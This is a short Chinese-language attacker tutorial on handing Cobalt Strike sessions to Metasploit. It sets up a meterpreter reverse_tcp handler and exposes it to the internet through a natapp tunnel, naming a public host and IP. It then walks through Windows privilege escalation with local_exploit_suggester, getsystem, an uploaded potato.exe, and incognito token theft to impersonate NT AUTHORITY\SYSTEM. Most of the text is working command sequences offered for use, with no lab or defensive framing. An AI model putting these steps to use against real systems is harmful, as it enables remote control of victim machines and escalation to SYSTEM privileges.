CS + MSF 联动

CS + MSF 联动

首先cs上已经成功上线：

Kali查看IP地址：

Msf上操作：
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.198.128
set lport 7777
exploit -j #-j 后台监听（ps：这里手抖少打了一个7）

如果msf处于公网，cs添加监听器Listener，HOST和PORT填写msf监听的地址IP:xxxx，PORT:7777即可：

如果msf主机处于内网那么我们可以通过内网穿透到公网上例如，这里使用https://natapp.cn/，在里面添加隧道；
本地地址:LHOST-IP
本地端口:LPORT-端口

去下载文件，然后运行加-authtoken=你的token，即可看见：

监听地址和端口：
server.natappfree.cc:36370 = 112.74.89.58:36370

然后派生会话，选择我们刚刚设置的监听器：


查看msf sessions可以看见已经得到：

提权技巧：

通过msf中自带的插件来识别当前系统中可以利用的EXP来进行提权。
use multi/recon/local_exploit_suggester
getuid：查看当前权限
getpid：查看当前进程的pid
getsystem：使用msf中自带的exp进行权限的提升（基本失败）
upload /root/potato.exe c:/   上传potato.exe到目标机器中的C:/目录下
use incognito：加载incoginto功能（用来盗窃目标主机的令牌或是假冒用户)
list_tokens -u：列出目标主机用户的可用令牌
execute -cH -f c:/potato.exe :创建新的进程
list_tokens -u :列出目标主机用户的可用令牌
impersonate_token "NT AUTHORITY\SYSTEM" :假冒目标主机上的可用令牌
chcp 65001 :设置编码格式为utf-8
whoami :查看当前权限